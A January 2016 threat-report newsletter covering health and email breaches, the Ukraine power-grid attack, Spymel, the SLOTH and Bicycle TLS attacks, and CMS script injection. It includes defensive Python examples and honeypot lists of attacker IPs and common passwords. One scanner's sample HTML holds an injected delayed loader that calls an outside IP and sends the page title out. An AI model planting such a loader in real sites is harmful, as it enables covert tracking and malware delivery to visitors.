Threat Report Monthly Wrap Up
January 2016

This month we cover the most impactful data breaches, including those affecting Centene and Time Warner Cable; the first confirmed cyber attack to cause a power outage, in Ukraine; newly discovered malware such as Spymel; and web and cloud security developments from the previous month.

Breaches

Centene Loses Hard Drives Containing 950,000 Individuals’ Protected Health Information (PHI)

On January 25, 2016, Centene, a St. Louis-based health insurer, reported that six hard drives containing the protected health information (PHI) of approximately 950,000 individuals were missing. The drives held records of individuals who received laboratory services from 2009 to 2015, including names, addresses, birth dates, social security numbers, member ID numbers, and health information.

The loss or unauthorized disclosure of PHI presents a lucrative opportunity for cybercriminals: health insurance credentials sell for about $20 each on the Dark Web. When combined with personally identifiable information (PII) such as social security number, date of birth, and place of birth into a package known as a "fullz" or "full identity kit," a single record can yield upwards of $1,000.

In the past, victims of PHI theft have reported their medical information being used to acquire treatment or services, obtain pharmaceuticals or medical equipment, or obtain government-provided benefits such as Medicare or Medicaid.  

Reference:  Press Release: Centene Announces Internal Search of Information Technology Assets | US Health Insurer Centene Loses 950,000 People's Records | Centene Says Employee Error Led to Missing Hard Drives, Company Still Searching for Records

Mitigation Strategies:

Note that the controls below detect misuse of data after it has been stolen; they do not prevent the loss of a physical drive. Encrypting data at rest on portable and removable media, and keeping an accurate asset inventory, are the controls that address the loss itself.

  • Monitor Intrusion Detection System (IDS) signatures to detect network reconnaissance and malware communications seeking instructions or callbacks from command and control infrastructure.
  • Use proper log management to detect suspicious fraud indicators such as shared usernames and passwords (one account active from several locations at once) or higher than normal volumes of data transfer.
  • Use network traffic analysis to inspect for suspicious or malicious activity, such as users accessing the network outside their working hours, and to detect data exfiltration.
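The log-management and traffic-analysis bullets above (and the similar log-management recommendations in the later sections) come down to two checks: one account used from more than one source address in a short window, and successful logins outside working hours. The script below, an added example that is not part of the original report, runs both checks over a constructed, simplified authentication log of the form `<ISO timestamp> <user> <source_ip> <result>`; the working-hours window, the sharing window, and the exempt service account are assumptions for the illustration.

```python
"""Detect credential sharing and off-hours access in authentication logs.

Added example (not from the original report). The log format is a
constructed, simplified one: "<ISO timestamp> <user> <source_ip> <result>".
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not real data).
SAMPLE_LOG = """\
2016-01-12T09:02:11 jsmith 10.1.4.22 SUCCESS
2016-01-12T09:05:40 jsmith 10.1.4.22 SUCCESS
2016-01-12T09:06:02 jsmith 203.0.113.77 SUCCESS
2016-01-12T13:15:00 mlee 10.1.4.31 SUCCESS
2016-01-12T23:48:19 mlee 10.1.4.31 SUCCESS
2016-01-13T02:10:05 svc_backup 10.1.9.9 SUCCESS
"""

WORK_START, WORK_END = 7, 19          # assumed working hours, 07:00-19:00 local
SHARE_WINDOW = timedelta(minutes=10)  # two source IPs for one user inside this window


def parse(log_text):
    """Parse log lines into (timestamp, user, ip, result) tuples, oldest first."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, result = line.split()
        events.append((datetime.fromisoformat(ts), user, ip, result))
    return sorted(events)


def shared_credentials(events, window=SHARE_WINDOW):
    """Return {user: set of source IPs} for users who logged in successfully
    from more than one IP within `window`; this suggests a shared or stolen
    password rather than one person moving between networks."""
    by_user = defaultdict(list)
    for ts, user, ip, result in events:
        if result == "SUCCESS":
            by_user[user].append((ts, ip))
    flagged = {}
    for user, hits in by_user.items():
        for i, (ts_i, ip_i) in enumerate(hits):
            for ts_j, ip_j in hits[i + 1:]:
                if ts_j - ts_i > window:
                    break  # hits are chronological, so later ones are further away
                if ip_j != ip_i:
                    flagged.setdefault(user, set()).update({ip_i, ip_j})
    return flagged


def off_hours(events, start=WORK_START, end=WORK_END, exempt=()):
    """Return (timestamp, user, ip) for successful logins outside [start, end),
    skipping accounts in `exempt` (e.g. service accounts that run overnight)."""
    return [(ts, user, ip) for ts, user, ip, result in events
            if result == "SUCCESS" and user not in exempt
            and not (start <= ts.hour < end)]


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("possible shared credentials:", shared_credentials(ev))
    for ts, user, ip in off_hours(ev, exempt={"svc_backup"}):
        print("off-hours login:", ts.isoformat(), user, ip)
```

On the sample data, jsmith is flagged for logging in from two addresses four minutes apart, and mlee for a login at 23:48; the backup service account is exempted so that a known overnight job does not generate noise. In production the same logic would read from the SIEM or syslog collector rather than an inline string.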

Time Warner Cable Warns 320,000 Customers of Data Breach

On January 6, 2016, Time Warner Cable (TWC) instructed 320,000 Road Runner customers to change their email passwords after attackers obtained their email addresses and passwords. According to several major news outlets, the data may have been harvested by malware installed during phishing attacks or reused from other, unrelated data breaches.

The FBI, not TWC, first identified the potential compromise and notified the company. The affected accounts belong to users of TWC's Road Runner service, i.e. customers with email addresses ending in "rr.com."

Because the compromise was discovered externally rather than by TWC itself, the credentials had likely been circulating for some time, and there is a high likelihood that cybercriminals have already sold and profited from them. The 320,000 accounts represent close to three percent of TWC's 11.4 million residential and business customers.

On the Dark Web, a stolen email account can net cybercriminals around $50, and any payment card data found inside the mailbox a further $6 to $25 per card.

References:  Time Warner Cable Confirms Major Data Breach | Time Warner Cable Warns 320,000 Customers of Hack | So What's All This About 320k Time Warner Cable Users Being Hacked?

Mitigation Strategies:

  • Affected customers should promptly reset their password to a strong one, at least 10-12 characters mixing uppercase and lowercase letters, numbers, and special characters, and one that is not reused on any other site, since reused passwords are exactly what attackers harvest from other breaches. They should also review bank and payment card statements for fraudulent transactions, report any incident promptly, and freeze or cancel compromised accounts.
  • NetFlow analysis can reveal traffic from an internal host to an untrusted destination such as a command and control server.
  • Log management can detect suspicious user account activity.
  • A Security Operations Center (SOC) team provides around-the-clock security monitoring, daily log review, web application firewall management, and advanced anomaly detection.

Malware

Ukraine Suffers World’s First Ever Hacker-Initiated Power Outage

On December 23, 2015, Ukraine suffered a coordinated attack on regional power companies that combined BlackEnergy 3 malware with denial-of-service activity and caused power outages affecting about 80,000 customers. Based on U.S. ICS-CERT analysis, the initial infection vector appears to have been a spear-phishing email carrying a weaponized Microsoft Word attachment.

The attackers used that access to open circuit breakers and cut power. The likely next steps were that they ran the KillDisk wiper utility to hinder recovery and then flooded the utilities' call centers with calls, a telephone denial of service that prevented call center employees from receiving customer outage reports.

This is the first known hacker-initiated power outage. Multiple security vendors and the Ukrainian government have implicated Russia, specifically the state-sponsored group known as Sandworm Team. Several reports give strong indications that actors affiliated with the Russian government carried out the attack; however, attribution to a specific threat actor is an onerous undertaking that requires time, resources, and patience, and should be treated as an assessment rather than a finding.

This recent case offers insight into how malicious actors can potentially execute a cyber operation against the critical infrastructure of perceived adversarial nation-states.

Reference: ICS-CERT Alert: ICS-ALERT-14-281-01C | Ukraine Utility Cyber Attack Wider Than First Reported | Analysis Confirms Coordinated Hack Attack Caused Ukrainian Power Outage | New Wave of Cyberattacks Against Ukrainian Power Industry

Mitigation Strategies:

  • Intrusion Detection System (IDS) signatures to monitor packets on the network and compare them against a comprehensive database of signatures for known malicious threats.
  • Log management to collect and aggregate data from multiple sources, examine it for indicators of suspicious or malicious activity, inform customers of potential threats, and look for signs of compromise.
  • 24x7 security monitoring to provide around-the-clock monitoring, alerting, reporting, and remediation services.

Spymel, New Digitally-Signed Malware Emerges

In early January 2016, security researchers discovered Spymel, a new digitally-signed information-stealing Trojan. It is delivered by phishing emails carrying a ZIP archive that contains a malicious JavaScript file; when the victim opens the file, it downloads and installs Spymel from a remote location.

Once installed, Spymel logs user keystrokes, monitors which applications are running (watching in particular for analysis and process-management tools such as Task Manager and Process Explorer), and sends what it collects to its command and control server. It can prevent the victim from running software capable of terminating it, and it relies on its digital signature to evade security software.

Spymel is another reminder of the upward trend of code-signed malware using legitimate digital certificates to bypass security mechanisms. Code-signing certificates are issued from the same Public Key Infrastructure (PKI) as the TLS/SSL certificates that keep sensitive information encrypted in transit; in both cases the certificate exists to establish trust between parties.

Code signing gives operating systems and security software a reason to trust a binary, and legitimately signed software is better protected against tampering. Malicious actors have abused that same trust and established an underground economy specializing in the purchase, sale, and distribution of stolen or fraudulently obtained certificates to circumvent defense mechanisms. A valid signature only proves that the holder of a private key signed the file, not that the file is benign, so defenders should weigh signer reputation, certificate age, and revocation status rather than treating "signed" as "safe."

Credentials stolen by an information stealer of this kind are equally dangerous in the cloud: with a victim's cloud credentials an attacker can eavesdrop on user activity and transactions, manipulate data, return falsified information, and redirect clients to malicious sites.

Reference: Spymel Trojan Taps Digital Certificates to Avoid Detection | Spymel Info-Stealing Trojan Evades Antivirus Detection via Stolen Certificates | Yet Another Signed Malware-Spymel


Mitigation Strategies:

  • Monitor Intrusion Detection System (IDS) signatures to detect malware communications seeking instructions or callbacks from command and control infrastructure.
  • A Security Operations Center (SOC) team that provides around-the-clock security monitoring, daily log review, web application firewall management, and advanced anomaly detection.
  • Log management that, if logging is configured correctly, detects new services installed or registry changes on a server. The same service can also examine logs for indicators of compromised credentials such as excessive downloads or shares and anomalous access patterns.

Cloud Security

Cryptographic Attacks Threaten Data-in-Motion

Earlier this month, at the 2016 Real World Cryptography conference, cryptography researchers presented SLOTH (Security Losses from Obsolete and Truncated Transcript Hashes), a new class of attacks on secure protocols such as TLS, IKE, and SSH that exploits the continued use of the weak MD5 and SHA-1 hash functions. A second, unrelated technique published around the same time, the HTTPS Bicycle attack, is a side channel on TLS traffic and does not depend on any hash weakness; the two are often reported together but have different causes and different fixes.

SLOTH is a transcript collision attack: where a protocol signs or MACs a hash of the handshake transcript computed with MD5 or SHA-1, an attacker who can find colliding transcripts can break the authentication that hash was meant to provide. The researchers demonstrated credential-forwarding and impersonation attacks against client authentication in TLS 1.2 when RSA-MD5 signatures are accepted, and weaker downgrade and channel-binding (tls-unique) attacks against TLS 1.1, IKEv2, and SSH-2.

The HTTPS Bicycle attack lets a passive observer learn the length of specific parts of the plaintext underneath TLS records. When TLS uses a stream cipher, ciphertext is exactly as long as plaintext, so an attacker who knows the structure of a request (for example a login form) can subtract the known parts and recover the length of the secret field, typically the user's password. It reveals the password's length, not the password itself, but that length narrows the search space for later brute-force or credential-stuffing attempts.

These attacks raise concerns about the protection of data in transit as it moves to the cloud. SLOTH in particular can be combined with a Man-in-the-Middle (MiTM) position to intercept and modify communications that both parties believe to be authenticated.

Cloud-based services are a natural target for MiTM because so much of their traffic crosses networks the customer does not control, and because the computing power needed to find MD5 collisions is now cheap. As more businesses turn to Anything-as-a-Service cloud models, we recommend phasing out MD5 and SHA-1 in TLS signature algorithms, certificates, and IKE/SSH configurations, and disabling RSA-MD5 signatures outright; note that this does not address the Bicycle side channel, which requires padding plaintext so that ciphertext length no longer reveals the length of sensitive fields.
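The Bicycle length leak described above, as an added example that is not from the original report or the researchers' code: a login request is encrypted with a toy length-preserving stream cipher (a stand-in for RC4 or AES-GCM; only the length-preserving property matters here), and an observer who knows the request template and the username recovers the password length from the ciphertext length alone. The host name, form field names, and the contrast function for CBC padding are assumptions for the illustration.

```python
"""HTTPS Bicycle attack, illustrated.

Added example, not from the original report. With a stream cipher the
ciphertext is exactly as long as the plaintext, so an observer who knows
the request template learns the length of the secret field (the password).
The keystream below is a toy stand-in for a real stream cipher; only the
length-preserving property is relevant.
"""
import hashlib
import hmac
import os


def toy_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (toy; not for production use)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def stream_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """XOR with the keystream: len(ciphertext) == len(plaintext), which is the leak."""
    ks = toy_keystream(key, nonce, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


def login_request(username: str, password: str) -> bytes:
    """Assumed request template (host and field names are invented).
    Password is assumed ASCII with no URL-encoded characters."""
    body = f"user={username}&pass={password}"
    return (
        "POST /login HTTP/1.1\r\n"
        "Host: example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    ).encode()


def infer_password_length(ciphertext_len: int, username: str) -> int:
    """Attacker's view: rebuild the template with candidate password lengths
    until the total matches the observed record length. The Content-Length
    header grows with the body, so candidates are tried rather than subtracted."""
    for plen in range(0, 256):
        if len(login_request(username, "x" * plen)) == ciphertext_len:
            return plen
    raise ValueError("no candidate length matches the observed ciphertext")


def cbc_record_len(plaintext_len: int, block: int = 16) -> int:
    """Contrast: a block cipher in CBC with TLS-style padding (at least one
    padding byte, MAC ignored) rounds the length up to a block boundary, so
    the observer only learns the length to within `block` bytes."""
    return (plaintext_len // block + 1) * block


def demo():
    """Encrypt a login for 'alice' and recover her password length from
    nothing but the ciphertext length. Returns (inferred, actual)."""
    key, nonce = os.urandom(32), os.urandom(12)
    secret = "Tr0ub4dor&3"
    ct = stream_encrypt(key, nonce, login_request("alice", secret))
    return infer_password_length(len(ct), "alice"), len(secret)


if __name__ == "__main__":
    inferred, actual = demo()
    print(f"inferred password length {inferred}, actual {actual}")
    body_len = len(login_request("alice", "Tr0ub4dor&3"))
    print(f"same request under CBC padding: {cbc_record_len(body_len)} bytes on the wire")
```

The observer needs no key material and performs no cryptanalysis; the information is in the record length. Padding to a fixed or block-aligned size, as `cbc_record_len` shows, is what removes the leak, and no change of hash function affects it.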

Reference: Security Losses from Obsolete and Truncated Transcript Hashes (CVE-2015-7575) | Transcript Collision Attacks: Breaking Authentication in TLS, IKE, and SSH | SLOTH Attacks Weaken Secure Protocols Because They Still Use MD5 and SHA-1 | How Long Is Your Password? HTTPS Bicycle Attack Reveals That and More


Web Security

Code Injection Affects 3,500 Public Servers Worldwide

On January 22, 2016, security vendor Symantec reported a worldwide compromise of some 3,500 public web servers. The injected code is a malicious script that redirects visitors to other compromised websites, which could in turn be used to deliver malware, and that gathers reconnaissance in support of future, unspecified attacks. Notably, the compromised sites ran the same content management system (CMS), and the injected scripts collected information such as page title, URL, referrer, Shockwave Flash version, user language, monitor resolution, and host IP address.

Reportedly, the injection runs when a visitor loads a compromised page in the browser. The malicious script waits 10 seconds, then loads remote JavaScript code, which in turn runs several additional scripts intended to hide the activity from the victim. Seventy-five percent of the infected websites, generally business, .edu, and government sites, are located in the United States.

CMS-powered websites such as Magento, Joomla, Drupal, and WordPress remain ideal targets for website defacement, botnet recruitment, malware distribution, and theft of customer and financial data. We suspect that Drupal and/or Magento installations could be exposed to this injection, since each vendor released patches in January addressing a cross-site request forgery or cross-site scripting vulnerability. We recommend that website administrators inspect the HTML their sites actually serve for injected script tags (in particular scripts that delay and then load code from unfamiliar hosts) and patch vulnerable CMS installations promptly.
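A way to carry out the inspection recommended above, as an added example that is not part of the original report or Symantec's analysis: the script parses a page's HTML, lists every external `<script src>` whose host is not on an allow-list, and flags inline scripts that combine a timer (`setTimeout`) with dynamic remote script loading, which is the delayed-loader pattern described in the report. The sample HTML, the trusted-host list, and the regular expressions are constructed for the illustration and should be tuned to the site being checked.

```python
"""Scan served HTML for injected scripts of the delayed remote-loader kind.

Added example, not from the original report. The HTML sample and the
allow-list of trusted script hosts are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list: hosts the site legitimately loads scripts from.
TRUSTED_HOSTS = {"www.example.org", "cdn.example.org"}

# A timer followed by dynamic script creation (or document.write of a
# <script> tag, or assignment of a remote URL to .src) is the pattern
# described above: wait, then pull code from a remote host.
DELAY_RE = re.compile(r"setTimeout\s*\(", re.I)
LOADER_RE = re.compile(
    r"createElement\s*\(\s*['\"]script['\"]\s*\)"
    r"|document\.write\s*\([^)]*<script"
    r"|\.src\s*=\s*['\"]?(?:https?:)?//",
    re.I,
)

# Constructed sample page with one legitimate CDN script, one injected
# external script on an unfamiliar host, and one injected delayed loader.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.org/jquery.js"></script>
<script src="//203.0.113.5/stat.js"></script>
</head><body>
<script>
setTimeout(function(){
  var s = document.createElement('script');
  s.src = 'http://203.0.113.5/l.php?t=' + encodeURIComponent(document.title);
  document.body.appendChild(s);
}, 10000);
</script>
<script>console.log("benign");</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of every <script src=...>
        self.inline = []     # text of every inline <script> block
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_html(html, trusted=TRUSTED_HOSTS):
    """Return a list of (finding_type, detail) for a page's HTML."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname      # None for relative (same-origin) paths
        if host and host not in trusted:
            findings.append(("untrusted-external-script", src))
    for code in collector.inline:
        if DELAY_RE.search(code) and LOADER_RE.search(code):
            findings.append(("delayed-remote-loader", code.strip()[:80]))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run it against HTML fetched from the live site rather than the files on disk, since the injection may live in the database or a template rather than in a static file; a clean result on disk with findings in the served page is itself a useful clue about where the injection sits.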

Reference: Drupal Moves to Fix Flaws in Update Process | Bugs in Drupal's Update Process Could Lead to Backdoored Updates, Site Compromise | If You're One of Millions Using Magento, Stop Whatever You're Doing and Patch Now | Usage of Content Management Systems for Websites

Honeypot Data - Top 20

IP Addresses
92.249.140.63 - NEW
217.114.218.18 - NEW
200.133.1.131 - NEW
218.24.91.130 - NEW
180.97.221.22 - NEW
62.212.82.51 - NEW
166.62.102.232 - NEW
95.211.224.49 - NEW
31.204.150.138 - NEW
209.58.130.151 - NEW
162.248.52.111 - NEW
91.229.77.92 - NEW
104.194.26.204 - NEW
104.194.26.205 - NEW
209.58.131.151 - NEW
88.198.41.86 - NEW
185.26.122.13 - NEW
82.199.130.34 - NEW
23.251.32.154 - NEW
85.25.198.199 - NEW
Most Attacked Passwords*
admin
123qwe
root
password
12345
ubnt
123456
1234
raspberry
123
support
12345678
1234567890
default
123456789
1234567
user
1
test
alpine
Most Attacked Ports*

Protocol   Service (port or alias)   Name
TCP        20005                     NetUSB
TCP        www                       World Wide Web HTTP
UDP        www                       World Wide Web HTTP
TCP        2700                      Matlab
TCP        RingZero                  [trojan] RingZero
TCP        RTB666                    [trojan] RTB 666
TCP        Seeker                    [trojan] Seeker
TCP        WANRemote                 [trojan] WAN Remote
TCP        WebDownloader             [trojan] WebDownloader
TCP        WebServerCT               [trojan] Web Server CT
TCP        9418                      git
UDP        http                      World Wide Web HTTP
TCP        [ICS] OPC UA XML          [ICS] OPC UA XML
TCP        8085                      http proxy for Koobface Variant
TCP        ReverseWWWTunnel          [trojan] Reverse WWW Tunnel Backdoor
TCP        Ramen                     [trojan] Ramen
TCP        Noob                      [trojan] Noob
TCP        AckCmd                    [trojan] AckCmd
TCP        BackEnd                   [trojan] Back End
TCP        BO2000Plug-Ins            [trojan] Back Orifice 2000 Plug-Ins

*The preceding data was shared by a honeypot maintained by the SANS Institute.